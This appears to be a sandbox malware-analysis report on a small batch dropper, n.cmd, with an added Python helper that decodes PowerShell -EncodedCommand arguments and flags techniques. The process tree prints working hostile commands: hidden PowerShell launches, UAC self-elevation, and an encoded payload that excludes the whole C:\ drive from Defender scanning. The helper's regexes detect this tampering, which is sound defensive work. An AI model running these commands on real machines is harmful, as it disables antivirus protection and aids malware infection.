Analysis

max time kernel: 66s
max time network: 20s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64 arch:x86 image:win7-20241010-en locale:en-us os:windows7-x64 system
submitted: 31/12/2024, 20:02

Static task: static1
Behavioral task: behavioral1
  Sample: n.cmd
  Resource: win7-20241010-en
General

Target: n.cmd
Size: 1KB
MD5: fa75e849a3beb187d543d9b4ae894dcc
SHA1: 41b1a755057677bfa617c089ba6092733155a1f0
SHA256: ea4b2c7dbf2be84aa81e55112e40392a7c54cfabde85d3ece594d834b3c9254d
SHA512: eed68bf4aba6af83620591f9cdefbe5e954f5bfbb14116015c215b306ecde7e8f9736b7e886e6ecbc0a71dda8ba2a58c7f4b5b7b6354104652715052e016f91f

Malware Config

Extracted: https://i.imghippo.com/files/CFqi5277Mc.jpg
Signatures

Command and Scripting Interpreter: PowerShell  4 IoCs
  pid   Process
  2932  powershell.exe
  2692  powershell.exe
  2868  powershell.exe
  1928  powershell.exe

Suspicious behavior: EnumeratesProcesses  8 IoCs
  pid   Process
  2932  powershell.exe
  2868  powershell.exe
  2868  powershell.exe
  2868  powershell.exe
  2692  powershell.exe
  2180  powershell.exe
  1928  powershell.exe
  1672  powershell.exe

Suspicious use of AdjustPrivilegeToken  6 IoCs
  description               pid   Process
  Token: SeDebugPrivilege   2932  powershell.exe
  Token: SeDebugPrivilege   2868  powershell.exe
  Token: SeDebugPrivilege   2692  powershell.exe
  Token: SeDebugPrivilege   2180  powershell.exe
  Token: SeDebugPrivilege   1928  powershell.exe
  Token: SeDebugPrivilege   1672  powershell.exe

Suspicious use of WriteProcessMemory  21 IoCs
  description                        pid   Process         procid_target
  PID 2792 wrote to memory of 2932   2792  cmd.exe         31  (3 calls)
  PID 2792 wrote to memory of 2868   2792  cmd.exe         32  (3 calls)
  PID 2868 wrote to memory of 2852   2868  powershell.exe  33  (3 calls)
  PID 2852 wrote to memory of 2692   2852  cmd.exe         35  (3 calls)
  PID 2852 wrote to memory of 2180   2852  cmd.exe         36  (3 calls)
  PID 2180 wrote to memory of 1928   2180  powershell.exe  37  (3 calls)
  PID 2852 wrote to memory of 1672   2852  cmd.exe         38  (3 calls)
Processes

C:\Windows\system32\cmd.exe  (PID 2792)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\n.cmd"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2932)
    powershell -w h -command ""
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2868)
    powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\n.cmd' -ArgumentList 'am_admin'"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\cmd.exe  (PID 2852)
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n.cmd" am_admin
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2692)
        powershell -w h -command ""
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2180)
        powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1928)
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1672)
        powershell -enc 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
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
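The process tree above shows three things worth pulling out automatically: the -enc argument of PID 2180 (base64 over UTF-16LE, which decodes to `powershell.exe -command "Add-MpPreference -ExclusionPath "C:\` followed by a CRLF), the UAC self-elevation through Start-Process -Verb RunAs with the am_admin marker argument in PID 2868, and the attempt in PID 1928 to exclude the whole C:\ drive from Defender scanning. Two caveats for the analyst: the stray inner quote in the encoded payload is why PID 1928 received `-ExclusionPath "` and `C:\` as separate tokens, and the Defender PowerShell module that provides Add-MpPreference does not exist on Windows 7, so in this sandbox image the exclusion step can only have failed, whereas on a Windows 10/11 host it would take effect. The Python helper below is an added illustration, not part of the Triage report or the sample; it decodes any prefix alias of -EncodedCommand that powershell.exe accepts (down to -e) and tags those techniques over the command lines copied from the tree. Its Defender pattern also covers Set-MpPreference -Disable* switches and -ExclusionProcess/-ExclusionExtension, which this sample does not use.

```python
"""Decode PowerShell -EncodedCommand arguments and tag two techniques seen in
the n.cmd process tree: UAC self-elevation (Start-Process -Verb RunAs) and
Defender exclusion tampering (Add-MpPreference -ExclusionPath).
Illustrative helper written for this report; not Triage's own code."""
import base64
import re
import shlex

# powershell.exe resolves switches by prefix and -EncodedCommand may be
# shortened all the way down to -e, so every prefix of the name is an alias.
_FULL = "encodedcommand"
ENCODED_SWITCHES = {"-" + _FULL[:i] for i in range(1, len(_FULL) + 1)}
ENCODED_SWITCHES |= {"/" + _FULL[:i] for i in range(1, len(_FULL) + 1)}

# (PID, command line) pairs copied from the process tree on this page.
PROCESS_TREE = [
    (2792, r'cmd /c "C:\Users\Admin\AppData\Local\Temp\n.cmd"'),
    (2932, 'powershell -w h -command ""'),
    (2868, r'''powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\n.cmd' -ArgumentList 'am_admin'"'''),
    (2852, r'"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n.cmd" am_admin'),
    (2692, 'powershell -w h -command ""'),
    (2180, "powershell -enc "
           "cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAt"
           "AE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAA"
           "IgBDADoAXAANAAoA"),
    (1928, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:' + "\\"),
]


def split_args(cmdline):
    """Tokenise a Windows command line, keeping quoted spans together.
    shlex in non-POSIX mode treats backslashes literally, which suits paths."""
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        return cmdline.split()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None when the command line
    has none. PowerShell expects base64 over UTF-16LE text."""
    args = split_args(cmdline)
    for switch, value in zip(args, args[1:]):
        if switch.lower() in ENCODED_SWITCHES:
            try:
                raw = base64.b64decode(value.strip('"'), validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # switch present but the value is not a valid payload
    return None


def effective_command(cmdline):
    """The text PowerShell actually runs: the decoded payload when -enc is
    used, otherwise the command line as given."""
    decoded = decode_encoded_command(cmdline)
    return decoded if decoded is not None else cmdline


# Defender tampering: adding exclusions or switching protection features off.
DEFENDER_TAMPER = re.compile(
    r"(add|set)-mppreference\s+.*?-(exclusion(path|process|extension)|disable\w+)",
    re.I | re.S)
# Self-elevation: relaunching a file through the UAC consent prompt.
SELF_ELEVATE = re.compile(r"start-process\b.*?-verb\s+runas\b", re.I | re.S)


def classify(cmdline):
    """Return the technique tags that apply to a single command line."""
    tags = []
    if decode_encoded_command(cmdline) is not None:
        tags.append("encoded-command")
    text = effective_command(cmdline)
    if SELF_ELEVATE.search(text):
        tags.append("uac-self-elevation")
    if DEFENDER_TAMPER.search(text):
        tags.append("defender-tamper")
    return tags


def analyze(tree):
    """Map PID -> tags for every process in the tree that triggers a tag."""
    findings = {}
    for pid, cmdline in tree:
        tags = classify(cmdline)
        if tags:
            findings[pid] = tags
    return findings


if __name__ == "__main__":
    print(repr(decode_encoded_command(PROCESS_TREE[5][1])))
    for pid, tags in analyze(PROCESS_TREE).items():
        print(pid, tags)
```

Running it against the tree flags PID 2868 for the elevation, PID 2180 for both the encoded command and the exclusion it carries, and PID 1928 for the exclusion as finally executed; the two `-w h -command ""` launches and the cmd.exe stages produce no tags. The same `classify` function can be run over EDR or Sysmon Event ID 1 command lines, where the decoded payload, not the raw base64, is what should be matched.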
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 8a4779b5f52772608ec3bed33b8d4c5e
  SHA1: 34e7a6c28514eff4be71b51a43b35f8708064a05
  SHA256: 220aa6a9aca3b3f53ddc97ff0af39d58ed3a0c1077d9a7c5d2973cef06ca4259
  SHA512: 6262a917775c375c577d6981e095b610b11aa0e8341f9f46aa198be9f1a986ff57df5cbf1bb6550a8ee54c0a6ab672f0425df7e001c022e3f624378c7cc62da4